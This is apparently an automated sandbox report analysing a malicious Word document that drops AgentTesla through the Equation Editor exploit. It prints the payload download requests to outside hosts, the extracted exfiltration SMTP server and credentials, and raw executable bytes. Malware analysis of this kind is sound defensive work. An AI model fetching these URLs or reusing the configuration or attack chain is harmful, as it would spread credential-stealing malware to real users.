Loading ...

Play interactive tourEdit tour

Analysis Report payment_advice.doc

Overview

General Information

Sample Name:payment_advice.doc
Analysis ID:356799
MD5:0ea6e37e930278b71774ae91d68bb879
SHA1:5e3721c21b04c30c0f2d3b7e83b7bb506fd55cb8
SHA256:3fda6eb4d90828826854806f1956d0d4a20bf5f95eb917370ff05ba5ba1dde66
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2472 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2300 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • twox67345.exe (PID: 2292 cmdline: C:\Users\user\AppData\Roaming\twox67345.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)
      • cmd.exe (PID: 2944 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • timeout.exe (PID: 2996 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
      • twox67345.exe (PID: 2936 cmdline: C:\Users\user\AppData\Roaming\twox67345.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)
      • twox67345.exe (PID: 2952 cmdline: C:\Users\user\AppData\Roaming\twox67345.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)
  • UGxXf.exe (PID: 2500 cmdline: 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe' MD5: 3DC83F17122DD592D607424A54C1E9CB)
    • cmd.exe (PID: 2924 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: AD7B9C14083B52BC532FBA5948342B98)
      • timeout.exe (PID: 2984 cmdline: timeout 1 MD5: 419A5EF8D76693048E4D6F79A5C875AE)
    • UGxXf.exe (PID: 648 cmdline: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe MD5: 3DC83F17122DD592D607424A54C1E9CB)
  • UGxXf.exe (PID: 1836 cmdline: 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe' MD5: 3DC83F17122DD592D607424A54C1E9CB)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "pEOdpd0kIi", "URL: ": "https://n2pGpXVLT5FR.net", "To: ": "", "ByHost: ": "mail.tpcdel.com:587", "Password: ": "ki7OGHHnlVdG04A", "From: ": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.UGxXf.exe.39bd920.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.twox67345.exe.38b4700.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.2.twox67345.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  11.2.UGxXf.exe.3974700.8.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.twox67345.exe.38fd920.8.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\twox67345.exe, CommandLine: C:\Users\user\AppData\Roaming\twox67345.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\twox67345.exe, NewProcessName: C:\Users\user\AppData\Roaming\twox67345.exe, OriginalFileName: C:\Users\user\AppData\Roaming\twox67345.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2300, ProcessCommandLine: C:\Users\user\AppData\Roaming\twox67345.exe, ProcessId: 2292
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 150.95.81.183, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2300, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://tunedinblog.com/wp-includes/twox.exeAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: twox67345.exe.2952.9.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "pEOdpd0kIi", "URL: ": "https://n2pGpXVLT5FR.net", "To: ": "", "ByHost: ": "mail.tpcdel.com:587", "Password: ": "ki7OGHHnlVdG04A", "From: ": ""}
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exeReversingLabs: Detection: 37%
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeReversingLabs: Detection: 37%
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeReversingLabs: Detection: 37%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: payment_advice.docReversingLabs: Detection: 43%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: nVisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$ source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: ,micC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDBe source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: nLC:\Windows\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: oC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDB, source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4UGxXf.PDB424491E3931}\Servererver32 source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp
                      Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
                      Source: global trafficDNS query: name: tunedinblog.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 150.95.81.183:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 150.95.81.183:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49165 -> 150.95.81.183:80
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: https://n2pGpXVLT5FR.net
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.35.120.75:587
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 15:53:54 GMTServer: Apache/2.2.31 (CentOS)Last-Modified: Tue, 23 Feb 2021 07:25:52 GMTETag: "211e7-99b78-5bbfbd40d5228"Accept-Ranges: bytesContent-Length: 629624Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 be 7d f2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 7c 09 00 00 06 00 00 00 00 00 00 2e 9b 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 8c 7e 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 9a 09 00 57 00 00 00 00 a0 09 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 84 09 00 78 17 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 7b 09 00 00 20 00 00 00 7c 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 03 00 00 00 a0 09 00 00 04 00 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 82 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9b 09 00 00 00 00 00 48 00 00 00 02 00 05 00 58 61 09 00 7c 39 00 00 03 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 22 02 28 17 00 00 0a 00 2a a6 73 18 00 00 0a 80 01 00 00 04 73 19 00 00 0a 80 02 00 00 04 73 0b 00 00 06 80 03 00 00 04 73 1a 00 00 0a 80 04 00 00 04 2a 42 02 28 17 00 00 0a 00 00 02 28 09 00 00 06 00 2a 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 58 01 00 70 fe 0e 01 00 72 5c 01 00 70 fe 0e 02 00 73 19 00 00 0a fe 0e 03 00 2b 06 fe 16 20 00 00 01 fe 0c 01 00 28 01 00 00 2b 6f 2c 00 00 0a fe 0e 04 00 38 38 00 00 00 fe 0d 04 00 28 2d 00 00 0a fe 0e 05 00 fe 0c 05 00 28 2e 00 00 0a fe 0c 02 00 28 13 00 00 0a da fe 0e 06 00 fe 0c 03 00 fe 0c 06 00 28 2f 00 00 0a 6f 25 00 00 0a 26 00 fe 0d 04 00 28 30 00 00 0a fe 0e 07 00 fe 0c 07 00 3a b2 ff ff ff dd 11 00 00 00 fe 0d 04 00 fe 16 05 00 00 1b 6f 27 00 00 0a 00 dc fe 0c 03 00 6f 31 00 00 0a fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 2a 00 00 01 10 00 00 02 00 24 00 6a 8e 00 11 00 00 00 00 1b 30 02 00 b6 00 00 00 06 00 00 11 00 72 68 01 00 70 fe 0e 01 00 72 7e 01 00 70 fe 0e 02
                      Source: global trafficHTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
                      Source: Joe Sandbox ViewIP Address: 172.67.172.17 172.67.172.17
                      Source: Joe Sandbox ViewASN Name: GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.35.120.75:587
                      Source: global trafficHTTP traffic detected: GET /wp-includes/twox.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tunedinblog.comConnection: Keep-Alive
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B08F3ED-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-includes/twox.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tunedinblog.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/4AE44766E50C275550C63C95498C19FE.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/C56E2AF17B6C065E85DB9FFDA54E4A78.html HTTP/1.1Host: coroloboxorozor.com
                      Source: unknownDNS traffic detected: queries for: tunedinblog.com
                      Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                      Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, twox67345.exe, 00000004.00000002.2272168458.00000000007BC000.00000004.00000020.sdmp, UGxXf.exe, 0000000B.00000002.2329693742.000000000069C000.00000004.00000020.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/4AE44766E50C275550C63C95498C19FE.html
                      Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
                      Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: twox67345.exe, 00000009.00000002.2360313482.0000000002814000.00000004.00000001.sdmpString found in binary or memory: http://mail.tpcdel.com
                      Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: twox67345.exe, 00000004.00000002.2272663469.00000000022D1000.00000004.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2330351390.0000000002391000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: twox67345.exe, 00000004.00000002.2283901109.00000000059F0000.00000002.00000001.sdmp, twox67345.exe, 00000009.00000002.2363872886.0000000005DA0000.00000002.00000001.sdmp, UGxXf.exe, 0000000B.00000002.2341353479.0000000005A80000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: twox67345.exe, 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmpString found in binary or memory: https://n2pGpXVLT5FR.net
                      Source: twox67345.exe, 00000009.00000002.2363471137.0000000005970000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\twox67345.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 11_2_0679C010 NtSetInformationThread,
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00601A69
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00600048
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00601788
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0060408A
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00600115
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_006005B0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061B4B0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00616898
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00617128
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061C900
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061D108
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_006189BF
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00614A08
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00617467
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061342F
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061908D
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061812F
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00617118
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061F5E8
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061A1C0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061A1B0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061F180
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061764F
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_006132E0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00615ABE
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061AF28
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061FBF0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_0061B788
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F9630
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F5620
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F6A1E
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F4A08
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F07A8
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F0B80
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F9828
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F78A5
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F24D0
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F1AEA
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F86D1
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F1B61
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F0798
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023FCFF8
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F78A5
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F9818
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F24C1
